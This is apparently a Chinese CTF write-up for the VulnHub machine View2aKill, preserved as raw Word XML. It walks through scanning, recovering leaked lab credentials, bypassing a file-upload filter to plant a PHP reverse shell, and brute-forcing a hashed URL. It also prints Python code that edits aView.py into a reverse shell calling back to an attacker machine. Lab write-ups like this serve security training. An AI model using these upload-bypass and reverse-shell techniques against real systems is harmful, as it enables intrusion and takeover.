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View-2aKill靶机练习实践报告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"https://drive.google.com/file/d/1Mi2rE0uffq7MPSve3_trnUtxln4HgKy_/view"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https://drive.google.com/file/d/1Mi2rE0uffq7MPSve3_trnUtxln4HgKy_/view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"https://download.vulnhub.com/view2akill/View2aKill.ova"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https://download.vulnhub.com/view2akill/View2aKill.ova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"https://download.vulnhub.com/view2akill/View2aKill.ova.torrent"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https://download.vulnhub.com/view2akill/View2aKill.ova.torrent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    (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F32370D8446DAD9D147079134D204094FA33CD1B&amp;dn=View2aKill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7F7F7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Flag is /root/flag/flag.sh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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>解压ova文件，得到.ovf文件和.vmdk文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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第一步：IP扫描，端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="1746250"/>
            <wp:effectExtent l="0" t="0" r="825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靶机IP为192.168.67.130。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2306320"/>
            <wp:effectExtent l="0" t="0" r="5080" b="17780"/>
            <wp:docPr id="4" name="图片 4" descr="1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靶机开放了端口22、端口25、端口80、端口8191。靶机上部署了ssh服务、邮件服务、apache服务和PHP服务器。逐个分析。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首先尝试爆破ssh服务的口令，未成功。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访问apache服务器，是一张gif图片，查看网页源码，未发现有用信息。下载图片分析，未发现有隐藏信息。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2143760"/>
            <wp:effectExtent l="0" t="0" r="1079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目录扫描，发现三个有效地址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"http://192.168.67.130:80/dev"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http://192.168.67.130:80/icons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没权限访问,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"http://192.168.67.130:80/dev"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http://192.168.67.130:80/dev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"http://192.168.67.130:80/dev"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http://192.168.67.130:80/pics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可以访问。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860165"/>
            <wp:effectExtent l="0" t="0" r="4445" b="698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"http://192.168.67.130:80/dev"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http://192.168.67.130:80/dev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返回如下图所示，逐个查看文件内容，寻找线索。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2325" cy="3368675"/>
            <wp:effectExtent l="0" t="0" r="952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rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>解压缩e_bkup.tar.gz,发</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>现四个文件，逐个分析文件内容。New_Employee_ONboarding_Chunk.rtf文件中出现口令提示信息，用户名是“chunck@localhost.com”,密码要去视频和文章中去寻找。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8595" cy="1748155"/>
            <wp:effectExtent l="0" t="0" r="8255" b="44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提示密码的数字部分是“transmit frequency of an HID proxcard reader”,正好发现/dev目录下有HID6005.pdf，打开文件搜索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transmit frequency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,确定密码的数字部分是125，如下图所示：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1261110"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1524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密码的字母提示在remote_control.gif中，仔细看git的控制器上的字母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HELICOPTER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215130" cy="2608580"/>
            <wp:effectExtent l="0" t="0" r="13970" b="127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至此，获得HR mgmt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"mailto:portal一组口令chuck@localhost.com:helicopter125"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portal一组口令chuck@localhost.com:helicopter125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。但是目前没有发现需要输入口令的地方，也没有发现portal网址。继续分析目录下其他文件内容，在Stop_Storing_Passwords.rtf中提示Max喜欢将认证凭证放在桌面上，无法获取到Max的desktop控制权，暂时无法利用。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269740" cy="1519555"/>
            <wp:effectExtent l="0" t="0" r="16510" b="444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没思路了，访问robots.txt碰碰运气，果然有收获，逐个尝试。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i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>robots协议也叫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>robots.txt（统一小写）是一种存放于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begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://baike.baidu.com/item/%E7%BD%91%E7%AB%99" \t "https://baike.baidu.com/item/robots%E5%8D%8F%E8%AE%AE/_blank" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>网站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end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>根目录下的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begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://baike.baidu.com/item/ASCII" \t "https://baike.baidu.com/item/robots%E5%8D%8F%E8%AE%AE/_blank" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ASCII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end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>编码的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begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://baike.baidu.com/item/%E6%96%87%E6%9C%AC%E6%96%87%E4%BB%B6" \t "https://baike.baidu.com/item/robots%E5%8D%8F%E8%AE%AE/_blank" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文本文件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end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，它通常告诉网络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begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://baike.baidu.com/item/%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E" \t "https://baike.baidu.com/item/robots%E5%8D%8F%E8%AE%AE/_blank" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>搜索引擎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end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的漫游器（又称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begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://baike.baidu.com/item/%E7%BD%91%E7%BB%9C%E8%9C%98%E8%9B%9B" \t "https://baike.baidu.com/item/robots%E5%8D%8F%E8%AE%AE/_blank" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>网络蜘蛛</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>），此网站中的哪些内容是不应被搜索引擎的漫游器获取的，哪些是可以被漫游器获取的。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648200" cy="198120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在/zorin路径下发现一个四个导航标签，逐个点击，发现HR mgmt的地址/sentrifugo。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119245" cy="1114425"/>
            <wp:effectExtent l="0" t="0" r="1460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157980" cy="607695"/>
            <wp:effectExtent l="0" t="0" r="13970" b="190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打开页面，发现这是个开源框架，漏扫一把，发现存在文件上传漏洞、SQL注入和XSS漏洞，仍需知道该开源框架的版本，这些漏洞能否被利用。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682365" cy="705485"/>
            <wp:effectExtent l="0" t="0" r="13335" b="184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打开help页面查看文档，正好泄露它的版本号是3.2，完美。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387600" cy="1116330"/>
            <wp:effectExtent l="0" t="0" r="12700" b="762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口令chuck@localhost.com:helicopter125登陆，全栈搜索可能存在上述三种漏洞的地方，终于发现一个可以上传文件的地方，试试。查看上述文件上传漏洞的描述信息，发现需要较高权限，作罢，试试普通的文件上传、文件包含漏洞，上传一个msf自带的php shell,做了校验，抓包拦截（上传php-reverse-shell.doc,在burp中拦截修改为php-reverse-shell.php），绕过前端的格式校验,当然上传shell之前，本地起nc监听端口。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493010" cy="1671955"/>
            <wp:effectExtent l="0" t="0" r="2540" b="44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44115" cy="570865"/>
            <wp:effectExtent l="0" t="0" r="1333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上传成功后竟然直接拿到一个shell,原来文件上传成功侯会在当前页面显示，因此直接执行，拿到shell，无需寻找文件包含的地方，也无需查看文件在后台是否被重命名。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有信息泄露说Max喜欢将凭证放在桌面，在shell窗口中查看Max的桌面，有两个文件，note.txt提示管理界面的访问地址是http://&lt;ip&gt;:8191/sha1(lowcase+view+digit(0-9)+digit(0-9)，允许远程执行计划。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2020" cy="2437130"/>
            <wp:effectExtent l="0" t="0" r="11430" b="127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30605"/>
            <wp:effectExtent l="0" t="0" r="8255" b="171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写个脚本爆破该地址。注意，一开始没有做长度判断，符合条件的太多，因此根据长度做过滤，获得地址。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#!/usr/bin/python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string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from hashlib import sha1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requests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url="http://192.168.67.130:8191/"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lowalp in string.ascii_lowercase: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for digit_0 in string.digits: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for digit_1 in string.digits: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tmpStr=sha1((lowalp+"view"+digit_0+digit_1+'\n').encode("utf-8")).hexdigest()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urlPath=url+tmpStr+'/'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r=requests.get(urlPath)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#print r.text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if len(r.text)&gt;167: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print urlPath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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>print r.text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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3801745" cy="2729230"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1397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Max桌面下还有一个文件aView.py,不允许当前shell访问，但允许jenny访问，去jenny的桌面看看。解压dsktp_backup.zip,有两个文件，逐个查看，在password.txt获得jenny的ssh口令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jenny:!!!sfbay!!!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。（详情见前面的图）然后查看todo.txt,提到了要推动aView.py脚本开发。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49520" cy="1054735"/>
            <wp:effectExtent l="0" t="0" r="17780" b="1206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ssh连接jenny的账户，查看aView.py的内容，仅仅打印一行字，留给Max的远程管理界面点击执行后也出现了同一行字，联想到之前获取到的信息，这个地址允许远程执行计划，大概率通过该路径可以执行aView.py的代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3188335" cy="1507490"/>
            <wp:effectExtent l="0" t="0" r="12065" b="1651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完善aView.py的代码，主动连接kali机器,别忘了在kali上做监听。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#!/usr/bin/python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 executed from php app add final wrapper/scirpt here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#print "waiting on engineers to tweak final code"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os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socket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subprocess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pty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s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)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s.connect(("192.168.67.128",6666))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os.dup2(s.fileno(),0)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print(2.1)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os.dup2(s.fileno(),1)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os.dup2(s.fileno(),2)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print(3)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pty.spawn("/bin/bash")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获取到一个root权限的shell,直接去/root/flag/目录查看，执行run_me_flag.sh，并根据提示访问地址，获取flag。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2941320" cy="3126740"/>
            <wp:effectExtent l="0" t="0" r="11430" b="1651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93310" cy="2303780"/>
            <wp:effectExtent l="0" t="0" r="2540" b="12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遇到一个新url路径，没思路就目录扫描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猜测网站可能用了第三方框架就去搜历史漏洞及利用办法。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重视常见可能存在信息泄露的地址。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15CE2C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AE15CE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BA3D7D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DFBA3D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50D10"/>
    <w:rsid w:val="03181A63"/>
    <w:rsid w:val="03E81B80"/>
    <w:rsid w:val="046551C7"/>
    <w:rsid w:val="049C4E68"/>
    <w:rsid w:val="04A9121C"/>
    <w:rsid w:val="04C138A2"/>
    <w:rsid w:val="06DE466A"/>
    <w:rsid w:val="0A820CBB"/>
    <w:rsid w:val="0AB15B9A"/>
    <w:rsid w:val="0BFB12CA"/>
    <w:rsid w:val="0C1932DF"/>
    <w:rsid w:val="0D40757B"/>
    <w:rsid w:val="0DEA2E84"/>
    <w:rsid w:val="0F832E9A"/>
    <w:rsid w:val="0FA77346"/>
    <w:rsid w:val="106871BF"/>
    <w:rsid w:val="11D36983"/>
    <w:rsid w:val="12C72E3B"/>
    <w:rsid w:val="13702390"/>
    <w:rsid w:val="15166488"/>
    <w:rsid w:val="1577598E"/>
    <w:rsid w:val="1580030D"/>
    <w:rsid w:val="16E8220F"/>
    <w:rsid w:val="17292819"/>
    <w:rsid w:val="18907AEB"/>
    <w:rsid w:val="18AF6746"/>
    <w:rsid w:val="197F35DE"/>
    <w:rsid w:val="19903293"/>
    <w:rsid w:val="19C13E2C"/>
    <w:rsid w:val="19E036CF"/>
    <w:rsid w:val="1A93415A"/>
    <w:rsid w:val="1B2F3C6D"/>
    <w:rsid w:val="1B683278"/>
    <w:rsid w:val="1C302214"/>
    <w:rsid w:val="1D546DC6"/>
    <w:rsid w:val="1E5A0F48"/>
    <w:rsid w:val="1EF75A47"/>
    <w:rsid w:val="1F4B4D1B"/>
    <w:rsid w:val="1F4C11BA"/>
    <w:rsid w:val="1FA3098B"/>
    <w:rsid w:val="23840368"/>
    <w:rsid w:val="239A31CE"/>
    <w:rsid w:val="245C0E51"/>
    <w:rsid w:val="278747C3"/>
    <w:rsid w:val="282E012B"/>
    <w:rsid w:val="29C53F25"/>
    <w:rsid w:val="2C474101"/>
    <w:rsid w:val="2E3456F9"/>
    <w:rsid w:val="2F2D1C4E"/>
    <w:rsid w:val="2FA84349"/>
    <w:rsid w:val="2FBB44B1"/>
    <w:rsid w:val="30431ED5"/>
    <w:rsid w:val="30766654"/>
    <w:rsid w:val="3180469B"/>
    <w:rsid w:val="327613F5"/>
    <w:rsid w:val="33BD5595"/>
    <w:rsid w:val="33C47375"/>
    <w:rsid w:val="345D4230"/>
    <w:rsid w:val="349770CD"/>
    <w:rsid w:val="355876EA"/>
    <w:rsid w:val="35F8647E"/>
    <w:rsid w:val="361B76FC"/>
    <w:rsid w:val="3ACE4748"/>
    <w:rsid w:val="3B913FCD"/>
    <w:rsid w:val="3C31328F"/>
    <w:rsid w:val="3C623342"/>
    <w:rsid w:val="3D42330D"/>
    <w:rsid w:val="3D837250"/>
    <w:rsid w:val="3E0D57D3"/>
    <w:rsid w:val="3EF636A5"/>
    <w:rsid w:val="3EFE16E6"/>
    <w:rsid w:val="41812DFC"/>
    <w:rsid w:val="41B64F40"/>
    <w:rsid w:val="420F04F2"/>
    <w:rsid w:val="43751302"/>
    <w:rsid w:val="43DB1BA6"/>
    <w:rsid w:val="43E10435"/>
    <w:rsid w:val="43F25270"/>
    <w:rsid w:val="44C459F5"/>
    <w:rsid w:val="44D14097"/>
    <w:rsid w:val="45133F6E"/>
    <w:rsid w:val="454378F1"/>
    <w:rsid w:val="46683546"/>
    <w:rsid w:val="4698450E"/>
    <w:rsid w:val="476F6C6F"/>
    <w:rsid w:val="47B97B9E"/>
    <w:rsid w:val="4BCB58A0"/>
    <w:rsid w:val="4C7C15E0"/>
    <w:rsid w:val="4F511E5C"/>
    <w:rsid w:val="4F7D43E0"/>
    <w:rsid w:val="503023BD"/>
    <w:rsid w:val="50E87D9E"/>
    <w:rsid w:val="50FB13EE"/>
    <w:rsid w:val="52480E27"/>
    <w:rsid w:val="525E1358"/>
    <w:rsid w:val="52D9656F"/>
    <w:rsid w:val="52E42A06"/>
    <w:rsid w:val="54206C63"/>
    <w:rsid w:val="548D35A8"/>
    <w:rsid w:val="57612733"/>
    <w:rsid w:val="577E61DB"/>
    <w:rsid w:val="57E77C26"/>
    <w:rsid w:val="58472978"/>
    <w:rsid w:val="589634C4"/>
    <w:rsid w:val="5927407C"/>
    <w:rsid w:val="599D1B0F"/>
    <w:rsid w:val="5B684AC0"/>
    <w:rsid w:val="5B795D19"/>
    <w:rsid w:val="5B8B365F"/>
    <w:rsid w:val="5D8344AE"/>
    <w:rsid w:val="61962989"/>
    <w:rsid w:val="624C030C"/>
    <w:rsid w:val="631F0772"/>
    <w:rsid w:val="63350845"/>
    <w:rsid w:val="6394516E"/>
    <w:rsid w:val="65C205C6"/>
    <w:rsid w:val="66EE652A"/>
    <w:rsid w:val="6BF93B27"/>
    <w:rsid w:val="6C7E2B78"/>
    <w:rsid w:val="6D0C21C8"/>
    <w:rsid w:val="6EC81672"/>
    <w:rsid w:val="6FF83EF9"/>
    <w:rsid w:val="70324929"/>
    <w:rsid w:val="70496C75"/>
    <w:rsid w:val="706E61E1"/>
    <w:rsid w:val="7187447D"/>
    <w:rsid w:val="71C5519E"/>
    <w:rsid w:val="738A7A12"/>
    <w:rsid w:val="73BF7ECC"/>
    <w:rsid w:val="73D20B06"/>
    <w:rsid w:val="73E9107A"/>
    <w:rsid w:val="744271C5"/>
    <w:rsid w:val="747F4827"/>
    <w:rsid w:val="774D285C"/>
    <w:rsid w:val="783547B9"/>
    <w:rsid w:val="788205D1"/>
    <w:rsid w:val="78B8103E"/>
    <w:rsid w:val="78DB590C"/>
    <w:rsid w:val="7A087FCE"/>
    <w:rsid w:val="7A392667"/>
    <w:rsid w:val="7A6053C5"/>
    <w:rsid w:val="7A902819"/>
    <w:rsid w:val="7AD66659"/>
    <w:rsid w:val="7C73731A"/>
    <w:rsid w:val="7DCB65E2"/>
    <w:rsid w:val="7E0F319F"/>
    <w:rsid w:val="7FFD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2020-02-27T12:23:16Z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